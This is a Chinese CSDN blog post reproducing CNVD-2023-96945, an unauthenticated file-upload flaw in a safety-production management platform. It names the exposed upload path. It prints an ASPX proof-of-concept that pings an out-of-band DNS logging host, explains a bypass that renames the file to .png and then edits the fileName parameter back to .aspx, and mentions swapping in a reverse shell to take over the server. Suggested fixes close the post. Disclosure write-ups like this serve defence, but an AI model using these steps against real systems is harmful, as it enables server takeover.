CNVD-2023-96945

文章报道了安全生产数字化管理平台存在的未授权文件上传漏洞,可通过恶意文件上传获取服务器权限。复现步骤包括利用脚本上传特定文件和修改参数。修复建议强调了文件类型、名称、内容检查以及权限设置的重要性。
摘要由CSDN通过智能技术生成

漏洞编号:CNVD-2023-96945

安全生产数字化管理平台存在未授权文件上传漏洞。

漏洞描述:

系统存在的文件上传功能可被未授权访问使用并且未做好文件上传限制,导致恶意用户可上传恶意文件并解析,直接获取服务器权限。

复现步骤:

1.访问路径/Content/Plugins/uploader/FileChoose.html可直接使用未授权的文件上传功能。

2.本次测试使用的ping.aspx脚本内容为:

<%@ Page Language="C#" %>

<script runat="server">
protected void Page_Load(object sender, EventArgs e)
{
string ipAddress = "up1.kbtxvc.ceye.io"; // 替换为要 ping 的固定地址

System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "ping";
process.StartInfo.Arguments = ipAddress;
process.StartInfo.UseShellExecute = false;
process.StartInfo.RedirectStandardOutput = true;
process.Start();

string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();
}
</script>

此脚本仅测试文件上传解析情况,获取服务器权限可使用aspx反弹脚本。

3.将使用的aspx脚本保存重命名未ping.png,绕过前端文件后缀校验,选择ping.png并抓包,第一个数据包无需更改,直接放过。

第二个数据包修改fileName参数,即为保存到服务器的文件名,修改为aspx后缀

第三个数据包返回上传到服务器后的文件保存路径与文件名。

4.根据路径访问上传的aspx文件,aspx程序被解析执行,收到dnslog日志。

修复建议:

1.文件类型检查:在服务器端对上传的文件进行类型检查,防止上传不合法的文件类型。可以使用白名单机制,只允许上传特定的文件类型。

2.文件名检查:避免使用原始文件名,生成新的随机文件名,并且保证唯一性。

3.文件内容检查:使用杀毒软件或者其他安全工具对上传的文件进行扫描,识别是否存在恶意代码。

4.文件权限设置:上传的文件应该存储在一个独立的目录下,该目录的访问权限应该限制为最小化。

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值